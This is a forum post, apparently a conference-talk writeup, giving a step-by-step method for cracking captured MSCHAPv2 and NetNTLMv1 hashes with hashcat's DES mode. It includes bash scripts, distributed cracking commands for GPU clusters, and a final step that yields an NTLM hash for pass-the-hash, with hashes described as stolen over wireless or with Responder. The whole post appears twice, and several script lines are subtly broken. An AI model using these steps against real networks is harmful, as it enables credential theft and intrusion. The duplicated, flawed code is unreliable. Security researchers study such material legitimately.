10-01-2016, 03:46 AM
So as we all know mode 14000 generic DES can be used for evil, particularly for MSCHAPv2, I spoke at DerbyCon and here's the writeup I promised. This demo used $99 format which is MSCHAPv2 and can be calculated by following the guide here https://markgamache.blogspot.ca/2013/01/n...roken.html and https://github.com/moxie0/chapcrack
Talk is here:
https://www.irongeek.com/i.php?page=video...on-evilmog
Step 1: obtain $99 (MSCHAPv2 or NetNTLMv1). Remove the $99, hash will look like this "$99ESIzRFVmd4hye041+UcSnqUrN7a6Gk0WGw=' and 'ESIzRFVmd4hye041+UcSnqUrN7a6Gk0WGw=' when done.
Step 2: take hash echo it with a newline and pipe to base64 with the decode flag and then pipe it to xxd for a hex dump like so "echo -n 'ESIzRFVmd4hye041+UcSnqUrnN7a6Gk0WGw=' | base64 -d | xxd"
Step 3: CT1 = bytes 9 - 16, CT2 = bytes 17 to 24, PT3 = bytes 25 - 28, CHAL (Challenge) = first 8 bytes from the hex dump
Step 4: CT1 and CT2 are both generated from the same challenge as explained in atoms post here https://hashcat.net/forum/archive/index....-5832.html so we can multicrack them, bonus. So you need to make a hashes.txt comprised of CT1:CHAL\nCT2:CHAL<EOF> essentially. You can do this manually or...
Step 5: Script it
#!/bin/bash
challenge=$(echo -n "$1" | base64 -d | xxd | head -n1 | cut -d " " -f2-5 | sed 's/ //g')
ct2=$(echo -n "$1" | base64 -d | xxd | tail -n1 | cut -d " " -f2-5 | sed 's/ //g')
pt3=$(echo -n "$1" | base64 -d | xxd | tail -n1 |cut -d " " -f6-7 | sed 's/ //g')
ct1=$(echo -n "$1" | base64 -d | xxd | head -n 1 | cut -d " " -f6-9 | sed 's/ //g')
echo $ct1:$challenge > hashes.txt
echo $ct2$challenge >> hashes.txt
echo $pt3 > pt3.txt
Feed it the hash in the stripped of $99 format like so
/home/hashcat> ./mschapv2.sh "ESIzRFVmd4hye041+UcSnqUrN7a6Gk0WGw="
and you have a hashes.txt file for mode 14000 and your pt3 file for putting this together
Step 6: crack this on hashcat in mode 14000, if you have 8x GTX 980's you should crack it in a maximum time of 11 days, with a median time of 5.5 days.
./hashcat -m 14000 hashes.txt -o cracked.txt -a 3 -w 4 -a charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1
Step 7) Distributed workload
This is doable on a longer term engagement but I don't usually have that kind of time, we need more nodes. Way more nodes. With more nodes comes management, -s and -l work for this but running the calculations by hand sucks and using middleware sucks even more. So hell with it lets automate it, I wrote a handy skip and limit calculator detailed here https://hashcat.net/forum/thread-5850.html and what it does is generates -s and -l values for you. In hashcat it has the ability to assign a chunk of a workload and not all of it, -s skips ahead to the section of keyspace you want to start at and -l tells hashcat to stop after processing a portion of the keyspace, while --keyspace tells you the size of the total keyspace. From here its simple math.
In the script the keyspace is 34359738368 or the value of the first argument. You also define an array with the count of gpu's in each of your system for example (4 4 4 4) would be 4 nodes with 4 GPU's each for a total of 32 GPU's. Your chunk size is your keyspace divided by total number of gpu's. Your remainder your chunk size multiplied by your total number of gpu's and then take that value and subtract it from your keyspace, it should be small or 0.
Now you start a counter at 0, loop into the array. You add 1 to the counter, so the first item has a counter value of 1, and the case of your first item the skip count is zero and the limit is calculated by multiplying the chunk size by its gpu count and then adding the remainder. Skipcount for the next node becomes the limit of the first. Every subsequent node you calculate limit as chunksize * the number of gpu's and skipcount and keep incrementing skipcount to determine position, the script just automates the whole thing and every major middleware does exactly that to distribute workloads, this is also why you can't -s and -l a characterset file for pathwell and have to do it as 100 different jobs.
So I digress you generate -s and -l for each of your nodes and repeat the crack
Node 1: /home/hashcat> ./hashcat -m 14000 hashes.txt -o cracked.txt -a 3 -w 4 -a charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1
-s 0 -l [whatever the script calculated]"
Node 2: /home/hashcat> ./hashcat -m 14000 hashes.txt -o cracked.txt -a 3 -w 4 -a charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1
-s [whatever script caulcated] -l [whatever the script calculated]"
etc, remove the brackets and all that, it should crack in a day maybe 2 if you throw 32 GTX 980's at it.
Step 8) atom writes a perl script to convert the cracked hashes into usable ntlm hash parts, this is because it outputs in $HEX[hash] format when there is unprintable characters.
https://github.com/hashcat/hashcat-utils...to_ntlm.pl
Step 9) EvilMog writes a script to use atoms script to generate a raw NTLM hash for use in PTH
#!/bin/bash
# relies on https://github.com/hashcat/hashcat-utils...to_ntlm.pl by atom
# takes cracked.txt and strips it of the $HEX[hash crap] to feed to atoms script and get results
cp1=$(perl deskey-to-ntlm.pl $(head -n1 cracked.txt | cut -d"[" -f2 | cut -d"]" -f1))
cp2=$(perl deskey-to-ntlm.pl $(tail -n1 cracked.txt | cut -d"[" -f2 | cut -d"]" -f1))
pt3=cat pt3.txt
ntlmhash="$cp1$cp2$pt3"
echo $ntlmhash
Step 10) profit, you now have the NTLM hash ready for PTH from a MSCHAPv2 hash stolen over wireless from some contractor who didn't enforce certificate checking on WPA2-Enterprise, or stolen with responder on the network via NetNTLMv1.
Thank you, I'm Evil_Mog on twitter, or sometimes EvilMog on #hashcat in freenode
Talk is here:
https://www.irongeek.com/i.php?page=video...on-evilmog
Step 1: obtain $99 (MSCHAPv2 or NetNTLMv1). Remove the $99, hash will look like this "$99ESIzRFVmd4hye041+UcSnqUrN7a6Gk0WGw=' and 'ESIzRFVmd4hye041+UcSnqUrN7a6Gk0WGw=' when done.
Step 2: take hash echo it with a newline and pipe to base64 with the decode flag and then pipe it to xxd for a hex dump like so "echo -n 'ESIzRFVmd4hye041+UcSnqUrnN7a6Gk0WGw=' | base64 -d | xxd"
Step 3: CT1 = bytes 9 - 16, CT2 = bytes 17 to 24, PT3 = bytes 25 - 28, CHAL (Challenge) = first 8 bytes from the hex dump
Step 4: CT1 and CT2 are both generated from the same challenge as explained in atoms post here https://hashcat.net/forum/archive/index....-5832.html so we can multicrack them, bonus. So you need to make a hashes.txt comprised of CT1:CHAL\nCT2:CHAL<EOF> essentially. You can do this manually or...
Step 5: Script it
#!/bin/bash
challenge=$(echo -n "$1" | base64 -d | xxd | head -n1 | cut -d " " -f2-5 | sed 's/ //g')
ct2=$(echo -n "$1" | base64 -d | xxd | tail -n1 | cut -d " " -f2-5 | sed 's/ //g')
pt3=$(echo -n "$1" | base64 -d | xxd | tail -n1 |cut -d " " -f6-7 | sed 's/ //g')
ct1=$(echo -n "$1" | base64 -d | xxd | head -n 1 | cut -d " " -f6-9 | sed 's/ //g')
echo $ct1:$challenge > hashes.txt
echo $ct2$challenge >> hashes.txt
echo $pt3 > pt3.txt
Feed it the hash in the stripped of $99 format like so
/home/hashcat> ./mschapv2.sh "ESIzRFVmd4hye041+UcSnqUrN7a6Gk0WGw="
and you have a hashes.txt file for mode 14000 and your pt3 file for putting this together
Step 6: crack this on hashcat in mode 14000, if you have 8x GTX 980's you should crack it in a maximum time of 11 days, with a median time of 5.5 days.
./hashcat -m 14000 hashes.txt -o cracked.txt -a 3 -w 4 -a charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1
Step 7) Distributed workload
This is doable on a longer term engagement but I don't usually have that kind of time, we need more nodes. Way more nodes. With more nodes comes management, -s and -l work for this but running the calculations by hand sucks and using middleware sucks even more. So hell with it lets automate it, I wrote a handy skip and limit calculator detailed here https://hashcat.net/forum/thread-5850.html and what it does is generates -s and -l values for you. In hashcat it has the ability to assign a chunk of a workload and not all of it, -s skips ahead to the section of keyspace you want to start at and -l tells hashcat to stop after processing a portion of the keyspace, while --keyspace tells you the size of the total keyspace. From here its simple math.
In the script the keyspace is 34359738368 or the value of the first argument. You also define an array with the count of gpu's in each of your system for example (4 4 4 4) would be 4 nodes with 4 GPU's each for a total of 32 GPU's. Your chunk size is your keyspace divided by total number of gpu's. Your remainder your chunk size multiplied by your total number of gpu's and then take that value and subtract it from your keyspace, it should be small or 0.
Now you start a counter at 0, loop into the array. You add 1 to the counter, so the first item has a counter value of 1, and the case of your first item the skip count is zero and the limit is calculated by multiplying the chunk size by its gpu count and then adding the remainder. Skipcount for the next node becomes the limit of the first. Every subsequent node you calculate limit as chunksize * the number of gpu's and skipcount and keep incrementing skipcount to determine position, the script just automates the whole thing and every major middleware does exactly that to distribute workloads, this is also why you can't -s and -l a characterset file for pathwell and have to do it as 100 different jobs.
So I digress you generate -s and -l for each of your nodes and repeat the crack
Node 1: /home/hashcat> ./hashcat -m 14000 hashes.txt -o cracked.txt -a 3 -w 4 -a charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1
-s 0 -l [whatever the script calculated]"
Node 2: /home/hashcat> ./hashcat -m 14000 hashes.txt -o cracked.txt -a 3 -w 4 -a charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1
-s [whatever script caulcated] -l [whatever the script calculated]"
etc, remove the brackets and all that, it should crack in a day maybe 2 if you throw 32 GTX 980's at it.
Step 8) atom writes a perl script to convert the cracked hashes into usable ntlm hash parts, this is because it outputs in $HEX[hash] format when there is unprintable characters.
https://github.com/hashcat/hashcat-utils...to_ntlm.pl
Step 9) EvilMog writes a script to use atoms script to generate a raw NTLM hash for use in PTH
#!/bin/bash
# relies on https://github.com/hashcat/hashcat-utils...to_ntlm.pl by atom
# takes cracked.txt and strips it of the $HEX[hash crap] to feed to atoms script and get results
cp1=$(perl deskey-to-ntlm.pl $(head -n1 cracked.txt | cut -d"[" -f2 | cut -d"]" -f1))
cp2=$(perl deskey-to-ntlm.pl $(tail -n1 cracked.txt | cut -d"[" -f2 | cut -d"]" -f1))
pt3=cat pt3.txt
ntlmhash="$cp1$cp2$pt3"
echo $ntlmhash
Step 10) profit, you now have the NTLM hash ready for PTH from a MSCHAPv2 hash stolen over wireless from some contractor who didn't enforce certificate checking on WPA2-Enterprise, or stolen with responder on the network via NetNTLMv1.
Thank you, I'm Evil_Mog on twitter, or sometimes EvilMog on #hashcat in freenode